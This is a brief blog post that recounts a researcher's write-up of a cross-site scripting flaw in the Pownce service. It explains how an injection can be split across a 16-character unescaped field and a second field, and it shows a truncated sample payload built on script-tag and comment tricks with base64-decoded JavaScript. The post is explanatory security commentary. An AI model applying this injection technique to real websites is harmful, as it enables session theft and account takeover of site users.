Another interesting posting by pdp from GnuCitizen: He found an XSS and XSRF flaw in Pownce, however this is not the interesting thing about the article.
What makes it worth reading is pdp’s technique to inject the javascript. Only a field of 16 characters at max is vulnerable as it does not escape the userinput. Any useful attack requires way more than just 16 chars.
What makes the technique work is that below the vulnerable field, there’s another field that takes user input but does in fact correctly escape it. In between the two fields there’s some HTML garbage. By just opening a script tag and a multiline JS comment, all that needs to be done in the second field is closing the comment and writing javascript code that works without using angle brackets or quotes.
As I’m writing this I realize that I’m probably not very good at explaining, so just have a look at the code and you’ll see what I mean:
[html junk]
*/<script>/*
[html junk]
*/document.write(atob(/PHN[...]EtLQ==/.toString().substr(1,56)));/*
[html junk]By using the eval() function, you can actually execute arbitrarily long base64 encoded javascript.
Picture of small house by Dom Dada
Cyberphobia 